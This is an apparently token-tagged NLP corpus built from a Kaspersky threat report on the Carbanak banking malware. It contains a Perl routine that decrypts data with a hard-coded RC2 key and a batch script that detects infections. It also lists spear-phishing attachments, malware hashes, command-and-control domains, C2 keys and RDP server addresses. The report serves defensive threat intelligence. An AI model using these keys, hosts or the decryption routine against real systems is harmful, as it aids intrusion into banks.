read VB O O
DATA2 NNP O O
, , O O
my PRP$ O O
$ $ O O
crypt_data NNS O O
, , O O
$ : O O
length NN O O
, , O O
8 CD O O
; : O O
my PRP$ O O
$ HYPH O O
key NN O O
= NN O O
" `` O O
vfDGbiwmiqdN6E2N NN O O
" '' O O
; : O O
my PRP$ O O
$ $ O O
cipher NN O O
= SYM O O
Crypt::CBC->new FW O O
( -LRB- O O
-cipher=>'Cipher::RC2 FW O O
' '' O O
, , O O
-header=>'none NN O O
' '' O O
, , O O
-literal_key=>1 XX O O
, , O O
-key=>$key NN O O
, , O O
– . O O
keysize=>16 NN O O
, , O O
-iv=>$iv LS O O
) -RRB- O O
; : O O
my PRP$ O O
$ HYPH O O
plaintext NN O O
= SYM O O
$ $ O O
cipher->decrypt($crypt_data LS O O
) -RRB- O O
; : O O
print NN O O
" '' O O
$ $ O O
plaintext NN O O
" '' O O
; : O O
@echo VB O O
off RP O O
for IN O O
/f CD O O
% NN O O
% NN O O
a DT O O
in FW O O
( -LRB- O O
' `` O O
hostname NN O O
' '' O O
) -RRB- O O
do VBP O O
set VBN O O
" `` O O
name=%%a JJ O O
" '' O O
echo NN O O
% NN O O
name% JJ O O
del FW O O
/f FW O O
% NN O O
name%.log JJ O O
2 CD O O
> XX O O
nul NN O O
if IN O O
exist VBP O O
" `` O O
c:\Documents NNS O O
and CC O O
settings\All SYM O O
users\application NN O O
data\ NN O O
mozilla\*.bin NN O O
" `` O O
echo NN O O
" '' O O
BIN NNP O O
detected VBD O O
" '' O O
> XX O O
> XX O O
% UH O O
name%.log XX O O
if IN O O
exist VBP O O
% . O O
SYSTEMROOT%\System32\com\svchost.exe JJ O O
echo NN O O
" `` O O
COM NNP O O
detected VBD O O
" '' O O
> XX O O
> XX O O
% UH O O
name%.log XX O O
if IN O O
exist VBP O O
" `` O O
c:\ProgramData\mozilla\*.bin JJ O O
" '' O O
echo NN O O
" '' O O
BIN2 NNP O O
detected VBD O O
" '' O O
> XX O O
> XX O O
% UH O O
name%.log XX O O
if IN O O
exist VBP O O
% . O O
SYSTEMROOT%\paexec NFP O O
* NFP O O
echo NN O O
" `` O O
Paexec NNP O O
detected VBD O O
" '' O O
> XX O O
> XX O O
% UH O O
name%.log XX O O
if IN O O
exist VBP O O
% . O O
SYSTEMROOT%\Syswow64\com\svchost.exe JJ O O
echo NN O O
" '' O O
COM64 NNP O O
detected VBD O O
" '' O O
> XX O O
> XX O O
% NN O O
name%.log JJ O O
SC NN O O
QUERY NNP O O
state= VBD O O
all DT O O
| NNS O O
find VBP O O
" `` O O
SERVICE_NAME NNP O O
" '' O O
| `` O O
findstr NN O O
" '' O O
Sys$ NN O O
" '' O O
if IN O O
q%ERRORLEVEL% FW O O
= SYM O O
= SYM O O
q0 JJ O O
SC NN O O
QUERY NNP O O
state= VBD O O
all DT O O
| NNS O O
find VBP O O
" `` O O
SERVICE_NAME NNP O O
" '' O O
| `` O O
findstr NN O O
" '' O O
Sys$ NN O O
" '' O O
> XX O O
> XX O O
% UH O O
name%.log XX O O
if IN O O
not RB O O
exist VB O O
% NN O O
name%.log JJ O O
echo NN O O
Ok NNP O O
> XX O O
% NN O O
name%.log JJ O O
xcopy RB O O
/y . O O
% NN O O
name%.log NN O O
" '' O O
\\<IP>\logVirus `` O O
This DT O O
section NN O O
contains VBZ O O
details NNS O O
on IN O O
spear NN O O
phishing VBG O O
emails NNS O O
sent VBN O O
by IN O O
the DT O O
attackers NNS O O
to TO O O
infect VB O O
victims NNS O O
. . O O

MD5 NN O O
: : O O
8fa296efaf87ff4d9179283d42372c52 CD O O
Name NN O O
of IN O O
attachment NN O O
: : O O
Соответствие NNP O O
ФЗ- NNP O O
115 CD O O
от NN O O
24.06.2014г.doc CD O O
Drops NNS O O
executable JJ O O
: : O O
MD5 NN O O
: : O O
a1979aa159e0c54212122fd8acb24383 NN O O
( -LRB- O O
Carbanak NNP O O
) -RRB- O O
Compiled NNP O O
Mon NNP O O
Apr NNP O O
04 CD O O
20:00:57 CD O O
2011 CD O O
( -LRB- O O
Probably RB O O
fake JJ O O
) -RRB- O O
C2 NN O O
on IN O O
update- JJ O O
java.net NN O O
C2 NN O O
key JJ O O
1234567812345678 CD O O
RDP NNP O O
on IN O O
37.235.54.48:443 CD O O
MD5 NN O O
: : O O
665b6cb31d962aefa3037b5849889e06 CD O O
Name NN O O
of IN O O
attachment NN O O
: : O O
Запрос.doc NNP O O
Drops VBZ O O
executable NN O O
: : O O
MD5 NN O O
: : O O
4afafa81731f8f02ba1b58073b47abdf CD O O
( -LRB- O O
Carbanak NNP O O
) -RRB- O O
Compiled VBN O O
Tue NNP O O
Jul NNP O O
01 CD O O
03:20:06 CD O O
2014 CD O O
Connects VBZ O O
to TO O O
: : O O
financialnewsonline.pw/FYocDxXpn5MXsHwZX/kLUAbd3w2/uUTsarcVKYk2W3B6hnc VB O O
Z NN O O
/ SYM O O
Gafh8U1W805Lo0N NNP O O
/ SYM O O
np7E3ICR6qx8keLDJZqUGXJKBDzfc6VYz9TNIlktObQ.htm RB O O
( -LRB- O O
185.10.58.175 CD O O
) -RRB- O O
C2 NN O O
on IN O O
financialnewsonline.pw ADD O O
, , O O
financialwiki.pw ADD O O
C2 NNP O O
key JJ O O
TXeyuryWcIuzxkWnyu NNP O O
RDP NNP O O
on IN O O
185.10.56.59:443 CD O O
MD5 NN O O
: : O O
2c395f211db2d02cb544448729d0f081 CD O O
Name NN O O
of IN O O
attachment NN O O
: : O O
new.doc ADD O O
Drops NNS O O
executable NN O O
: : O O
MD5 NN O O
: : O O
551d41e2a4dd1497b3b27a91922d29cc CD O O
( -LRB- O O
Carbanak NNP O O
) -RRB- O O
Compiled NNP O O
Mon NNP O O
Aug NNP O O
04 CD O O
01:10:40 CD O O
2014 CD O O
Connects VBZ O O
to TO O O
: : O O
http://worldnewsonline.pw/JybDHkfWGURJPuWeUpPMX/ca9BThbDim0Hdk/9YzkJS7 ADD O O
m8a19tzQwZxo1vvQ NN O O
/ SYM O O
r/7SHJcCm4tdpZGp.dmDwKfMjpWBM18eX8VUiimyaUZMGoClZ6 NN O O
eShS9tLCKtuHvlMQ3Dc26y90FbPIua.7LGHGZCBPj.vd08DUENC5oAE4VfyUz.shtml CD O O
C2s NN O O
on IN O O
worldnewsonline.pw ADD O O
, , O O
worldnews24.pw ADD O O
C2 NNP O O
key JJ O O
JDvkyfhZxkMmDSwUkqvReIvC NNP O O
RDP NNP O O
on IN O O
185.10.56.59:443 CD O O
MD5 NN O O
: : O O
31e16189e9218cb131fdb13e75d0a94f CD O O
Name NN O O
of IN O O
attachment NN O O
: : O O
Анкета- ADD O O
Заявление.doc NNP O O
Drops VBZ O O
executable NN O O
: : O O
MD5 NN O O
: : O O
4e107d20832fff89a41f04c4dff1739b CD O O
( -LRB- O O
Carbanak NNP O O
) -RRB- O O
C2 NN O O
on IN O O
public- NN O O
dns.us ADD O O
C2 NNP O O
key JJ O O
1234567812345678 CD O O
RDP NNP O O
on IN O O
37.235.54.48:443 CD O O
MD5 NN O O
: : O O
db83e301564ff613dd1ca23c30a387f0 NN O O
Name NN O O
of IN O O
attachment NN O O
: : O O
Соответствие NNP O O
ФЗ- NNP O O
115 CD O O
от NN O O
21.07.2014г.doc CD O O
Drops NNS O O
executable JJ O O
: : O O
MD5 NN O O
: : O O
cb915d1bd7f21b29edc179092e967331 NN O O
( -LRB- O O
Carbanak NNP O O
) -RRB- O O
Compiled VBN O O
Tue NNP O O
Apr NNP O O
08 CD O O
05:44:12 CD O O
2014 CD O O
Connects VBZ O O
to TO O O
: : O O
datsun- ADD O O
auto.com ADD O O
/ SYM O O
bDqxEs RB O O
/ SYM O O
Ta6IPJq3zqmRY- NNP O O
.5/8SgGLA- NNP O O
F NNP O O
/ SYM O O
I9CstBYT1rK7kx.440Sbtru.cgi?QVzF NNP O O
= SYM O O
tNM2gdtMLscx5bB4uryjM&PfpxBukmcOaD- XX O O
Ucygbtzv4=f8fx XX O O
MD5 XX O O
: : O O
f88a983fc0ef5bb446ae63250e7236dd NN O O
Name NN O O
of IN O O
attachment NN O O
: : O O
Приглашение.msg NNP O O
Drops VBZ O O
executable NN O O
: : O O
MD5 NN O O
: : O O
3dc8c4af51c8c367fbe7c7feef4f6744 CD O O
( -LRB- O O
Carbanak NNP O O
) -RRB- O O
Compiled VBN O O
Fri NNP O O
Aug NNP O O
08 CD O O
00:48:07 CD O O
2014 CD O O
C2s NN O O
on IN O O
worldnewsonline.pw ADD O O
, , O O
worldnews24.pw ADD O O
C2 NNP O O
key JJ O O
vfDGbiwmiqdN6E2N NN O O
RDP NN O O
on IN O O
185.10.56.59:443 CD O O
MD5 NN O O
: : O O
c4a6a111a070856c49905d815f87ab49 NN O O
Name NN O O
of IN O O
attachment NN O O
: : O O
ЧОСВЯЮООАГЖЦСЦЧОЧю NNP O O
Drops VBZ O O
executable NN O O
: : O O
MD5 NN O O
: : O O
cb915d1bd7f21b29edc179092e967331 NN O O
( -LRB- O O
Carbanak NNP O O
) -RRB- O O
Connects VBZ O O
to TO O O
: : O O
GET VB O O
/cBAWFvkXi94QxShRTaVVn . O O
/ SYM O O
YzAxD NNP O O
/ SYM O O
X0sZEud.5gNItbvozI3tqT5ly9UYLVii13.bml?tlxCFi NNP O O
Busj=2OVj&9GP NN O O
= SYM O O
a5houGz&K.F FW O O
= SYM O O
T&l0.7FBN75=nMPDrlGXq4s7cIAQ0Cl662IwVjxvsiTOlG FW O O
0d0pd FW O O
HTTP/1.1 FW O O
Host NN O O
: : O O
datsun- ADD O O
auto.com ADD O O
MD5 NN O O
: : O O
86e48a9be62494bffb3b8e5ecb4a0310 CD O O
Name NN O O
of IN O O
attachment NN O O
: : O O
Приглашение.doc NNP O O
Drops VBZ O O
executable NN O O
: : O O
MD5 NN O O
: : O O
3dc8c4af51c8c367fbe7c7feef4f6744 CD O O
( -LRB- O O
Carbanak NNP O O
) -RRB- O O
Compiled VBN O O
Fri NNP O O
Aug NNP O O
08 CD O O
00:48:07 CD O O
2014 CD O O
MD5 NN O O
: : O O
6c7ac8dfd7bc5c2bb1a6d7aec488c298 CD O O
Name NN O O
of IN O O
attachment NN O O
: : O O
Соответствие NNP O O
ФЗ- NNP O O
115 CD O O
от NN O O
02.07.2014г NNS O O
.. NFP O O
doc NN O O
, , O O
Drops VBZ O O
executable NN O O
: : O O
MD5 NN O O
: : O O
cb915d1bd7f21b29edc179092e967331 NN O O
( -LRB- O O
Carbanak NNP O O
) -RRB- O O
Compiled VBN O O
Tue NNP O O
Apr NNP O O
08 CD O O
05:44:12 CD O O
2014 CD O O
Connects VBZ O O
to TO O O
: : O O
datsun- ADD O O
auto.com ADD O O
/ SYM O O
bDqxEs RB O O
/ SYM O O
Ta6IPJq3zqmRY- NNP O O
.5/8SgGLA- NNP O O
F NNP O O
/ SYM O O
I9CstBYT1rK7kx.440Sbtru.cgi?QVzF NNP O O
= SYM O O
tNM2gdtMLscx5bB4uryjM&PfpxBukmcOaD- FW O O
Ucygbtzv4=f8fx $ O O
36 CD O O
samples NNS O O
Securelist NNP O O
, , O O
the DT O O
resource NN O O
Follow VB O O
us PRP O O
for IN O O
Kaspersky NNP O O
Lab NNP O O
experts NNS O O
' POS O O
technical JJ O O
research NN O O
, , O O
Academy NNP O O
Business NNP O O
Eugene NNP O O
SecureList NNP O O
ThreatPost NNP O O
Daily NNP O O
analysis NN O O
, , O O
and CC O O
thoughts NNS O O
. . O O

Academy NNP O O
Business NNP O O
Eugene NNP O O
ThreatPost NNP O O
Daily NNP O O
Kaspersky NNP O O
Lab NNP O O
global JJ O O
Website NNP O O
Eugene NNP O O
Kaspersky NNP O O
Blog NNP O O
Daily NNP O O
Business NNP O O
Daily NNP O O
Kaspersky NNP O O
Lab NNP O O
B2C NNP O O
Blog NNP O O
Kaspersky NNP O O
Lab NNP O O
B2B NNP O O
Blog NNP O O
Academy NNP O O
Business NNP O O
ThreatPost NNP O O
Daily NNP O O
Academy NNP O O
Business NNP O O
Daily NNP O O
Kaspersky NNP O O
Lab NNP O O
security NN O O
news NN O O
service NN O O
Kaspersky NNP O O
Lab NNP O O
Academy NNP O O
39A/3 CD O O
Leningradskoe NNP O O
Shosse NNP O O
Moscow NNP O O
, , O O
125212 CD O O
Russian NNP O O
Federation NNP O O
more JJR O O
contact NN O O
details NNS O O
Tel NN O O
: : O O
+ SYM O O
7 CD O O
- HYPH O O
495 CD O O
- HYPH O O
797 CD O O
- HYPH O O
8700 CD O O
Fax NN O O
: : O O
+ SYM O O
7 CD O O
- HYPH O O
495 CD O O
- HYPH O O
797 CD O O
- HYPH O O
8709 CD O O

